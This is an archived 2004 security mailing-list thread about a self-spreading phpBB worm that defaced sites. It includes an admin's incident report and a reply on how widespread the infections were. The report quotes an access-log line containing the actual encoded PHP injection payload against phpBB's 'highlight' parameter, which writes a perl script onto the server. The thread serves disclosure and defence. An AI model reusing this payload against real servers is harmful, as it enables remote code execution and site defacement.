Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: phpBB Worm

from [Paul Kurczaba] Network Security [Permanent Link]
Subject: RE: phpBB Worm
Date: Tue, 21 Dec 2004 15:11:27 -0500 
It seems that a good number of sites have been compromised due to this
exploit. Doing a search for "NeverEverNoSanity WebWorm Generation" on google
revealed nothing. But, when I did the same search on the new MSN beta search
engine, a whopping 36,000 hits showed up. Check it out:
http://beta.search.msn.com/results.aspx?q=%22NeverEverNoSanity+WebWorm+Gener
ation%22&FORM=QBRE

-Paul K 

-----Original Message-----
From: Shannon Lee [mailto:shannon@webhostworks.net] 
Sent: Monday, December 20, 2004 6:51 PM
To: bugtraq@securityfocus.com
Subject: phpBB Worm

This morning one of our client's sites was found to have been defaced with
the words "NeverEverNoSanity WebWorm Generation 9."  The defacement appeared
to take place on all .html files in the web root trees of multiple virtual
hosts on the web server in a very short period of time.

After some investigation, we determined that the attacker had gained access
via phpbb in a series of crafted URL requests, like so:

64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
/viewtopic.php?p=9002&sid=f5
399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252
echr
(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)
),ch
r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr
(47)
%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)
%252
echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%25
2ech
r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE
OMITTED.com/
viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%25
2Efw
rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252ech
r(11
1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252ech
r(11
5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47
)%25
2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%2
52ec
hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1)"

After checking the phpbb site, it turns out that this is a vulnerability
posted the 18th of November, called Hilight; we didn't update to prevent it
because the client whose domain it was has their own admin, and we thought
he was taking care of phpBB.  Oops.  The exploit is described here:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

When I copied all these entries out of the log and translated the chr()
calls, they turned out to be the attached perl script, which is capable of
finding .html files to deface, and then going to google and finding more
instances of phpbb to infect.  Which makes it a worm.  It also tracks itself
by generation; we were generation 9.

Please find attached the above-mentioned script as well as the series of log
entries from access_log.

--Shannon
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: AIX 5.1/5.2/5.3 local root exploits (paginit issue), Shiva Persaud
Next by Date:  [SECURITY] [DSA 613-1] New ethereal packages fix denial of service, Martin Schulze
Previous by Thread:  Re: phpBB Worm, Anders Henke
Next by Thread:  Re: phpBB Worm, Alexander Klimov
Indexes:  [Date] [Thread] [Top] [All Lists]